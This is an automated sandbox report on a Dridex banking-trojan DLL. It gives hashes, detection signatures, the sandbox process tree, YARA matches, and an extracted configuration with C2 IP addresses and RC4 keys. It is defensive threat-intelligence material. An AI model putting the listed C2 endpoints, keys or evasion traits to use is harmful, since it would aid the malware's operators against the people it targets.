Play interactive tour

Edit tour

Analysis Report fc0bc077_by_Libranalysis.dll

Overview

General Information

Sample Name:	fc0bc077_by_Libranalysis.dll
Analysis ID:	404283
MD5:	fc0bc07721ce94bc9b100e7c846a1210
SHA1:	2d98f05fb78cd75bb44a0087bead8c1604545d07
SHA256:	e707edac036a1a2d08b746c6a50ac0f0e2b1ba1c2668aadf87ea11b666b0eb28
Tags:	Dridex
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Dridex unpacked file

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to query locales information (e.g. system language)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

One or more processes crash

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

loaddll32.exe (PID: 5980 cmdline: loaddll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 5984 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 4088 cmdline: rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 1848 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 760 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 4860 cmdline: rundll32.exe C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll,LoxmtYt MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 5852 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 788 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 5168 cmdline: rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',DllCanUnloadNow MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 4240 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 752 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 4788 cmdline: rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',DllGetClassObject MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 3492 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 760 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 5188 cmdline: rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',WdiAddFileToInstance MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 1760 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5188 -s 756 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 5204 cmdline: rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',WdiAddParameter MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 5172 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 756 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 5220 cmdline: rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',WdiCancel MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 40112, "C2 list": ["193.200.130.181:443", "95.138.161.226:2303", "167.114.113.13:4125"], "RC4 keys": ["MqW38NQIO70GhjGOOvjtl5AwyenW6A8fcZ", "xeMr6QHn7uRk1D2ChU8OuyaRFUZJZZHUIgxCzaPXtOkjmhTMtNxfWU8nlnD7q009ahEI51R1"]}

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_1d91dafffd792f9b512ff42d10d3dd5f24a3f5de_82810a17_10f0240f\Report.wer	SUSP_WER_Critical_HeapCorruption	Detects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation)	Florian Roth	0x11c:$a1: ReportIdentifier= 0x19e:$a1: ReportIdentifier= 0x77c:$a2: .Name=Fault Module Name 0x92a:$s1: c0000374
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_1d91dafffd792f9b512ff42d10d3dd5f24a3f5de_82810a17_0766ec0c\Report.wer	SUSP_WER_Critical_HeapCorruption	Detects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation)	Florian Roth	0x11c:$a1: ReportIdentifier= 0x19e:$a1: ReportIdentifier= 0x77c:$a2: .Name=Fault Module Name 0x92a:$s1: c0000374

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.326004095.0000000010001000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000014.00000002.480983725.0000000010001000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000010.00000002.489951685.0000000010001000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000011.00000002.489294314.0000000010001000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000013.00000002.488379155.0000000010001000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000012.00000002.486848351.0000000010001000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
19.2.rundll32.exe.10000000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
4.2.rundll32.exe.10000000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
20.2.rundll32.exe.10000000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
16.2.rundll32.exe.10000000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
18.2.rundll32.exe.10000000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
17.2.rundll32.exe.10000000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 19.2.rundll32.exe.10000000.3.unpack

Malware Configuration Extractor: Dridex {"Version": 40112, "C2 list": ["193.200.130.181:443", "95.138.161.226:2303", "167.114.113.13:4125"], "RC4 keys": ["MqW38NQIO70GhjGOOvjtl5AwyenW6A8fcZ", "xeMr6QHn7uRk1D2ChU8OuyaRFUZJZZHUIgxCzaPXtOkjmhTMtNxfWU8nlnD7q009ahEI51R1"]}

Multi AV Scanner detection for submitted file

Show sources

Source: fc0bc077_by_Libranalysis.dll	Metadefender: Detection: 21%			Perma Link
Source: fc0bc077_by_Libranalysis.dll	ReversingLabs: Detection: 29%

Machine Learning detection for sample

Show sources

Source: fc0bc077_by_Libranalysis.dll

Joe Sandbox ML: detected

Source: 0.2.loaddll32.exe.1370000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 19.2.rundll32.exe.2cd0000.2.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 18.2.rundll32.exe.2830000.2.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 16.2.rundll32.exe.2940000.2.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 17.2.rundll32.exe.3220000.2.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 4.2.rundll32.exe.26e0000.2.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 20.2.rundll32.exe.2be0000.2.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 3.2.rundll32.exe.2d50000.2.unpack	Avira: Label: TR/ATRAPS.Gen2

Source: fc0bc077_by_Libranalysis.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: fc0bc077_by_Libranalysis.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: FGERN.pdb source: fc0bc077_by_Libranalysis.dll

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 193.200.130.181:443
Source: Malware configuration extractor	IPs: 95.138.161.226:2303
Source: Malware configuration extractor	IPs: 167.114.113.13:4125

Source: Joe Sandbox View	IP Address: 167.114.113.13 167.114.113.13
Source: Joe Sandbox View	IP Address: 95.138.161.226 95.138.161.226

Source: Joe Sandbox View	ASN Name: OVHFR OVHFR
Source: Joe Sandbox View	ASN Name: RACKSPACE-LONGB RACKSPACE-LONGB

Source: loaddll32.exe, 00000000.00000002.583611502.000000000157B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 00000004.00000002.326004095.0000000010001000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.480983725.0000000010001000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.489951685.0000000010001000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.489294314.0000000010001000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.488379155.0000000010001000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.486848351.0000000010001000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 19.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10001494	4_2_10001494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000846C	4_2_1000846C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000A52C	4_2_1000A52C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10011D58	4_2_10011D58
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10019348	4_2_10019348
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10010754	4_2_10010754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100090CC	4_2_100090CC

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 760

Source: fc0bc077_by_Libranalysis.dll

Binary or memory string: OriginalFilenamej2pcsc.dllN vs fc0bc077_by_Libranalysis.dll

Source: fc0bc077_by_Libranalysis.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_1d91dafffd792f9b512ff42d10d3dd5f24a3f5de_82810a17_10f0240f\Report.wer, type: DROPPED	Matched rule: SUSP_WER_Critical_HeapCorruption date = 2019-10-18, author = Florian Roth, description = Detects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation), reference = https://twitter.com/cyb3rops/status/1185459425710092288, score =
Source: C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_1d91dafffd792f9b512ff42d10d3dd5f24a3f5de_82810a17_0766ec0c\Report.wer, type: DROPPED	Matched rule: SUSP_WER_Critical_HeapCorruption date = 2019-10-18, author = Florian Roth, description = Detects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation), reference = https://twitter.com/cyb3rops/status/1185459425710092288, score =

Source: fc0bc077_by_Libranalysis.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal76.troj.evad.winDLL@23/24@0/4

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4088
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5188
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4860
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5168
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5204
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4788

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERD97E.tmp

Jump to behavior

Source: fc0bc077_by_Libranalysis.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll,LoxmtYt

Source: fc0bc077_by_Libranalysis.dll	Metadefender: Detection: 21%
Source: fc0bc077_by_Libranalysis.dll	ReversingLabs: Detection: 29%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll,LoxmtYt
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 760
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 788
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',DllCanUnloadNow
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',DllGetClassObject
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',WdiAddFileToInstance
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',WdiAddParameter
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',WdiCancel
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 752
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5188 -s 756
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 760
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 756
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll,LoxmtYt	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',DllCanUnloadNow	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',DllGetClassObject	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',WdiAddFileToInstance	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',WdiAddParameter	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',WdiCancel	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\fc0bc077_by_Libranalysis.dll',#1	Jump to behavior

Source: fc0bc077_by_Libranalysis.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: fc0bc077_by_Libranalysis.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: FGERN.pdb source: fc0bc077_by_Libranalysis.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_1000F6CC push esi; mov dword ptr [esp], 00000000h

4_2_1000F6CD

Source: initial sample

Static PE information: section name: .text entropy: 7.5511794748

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
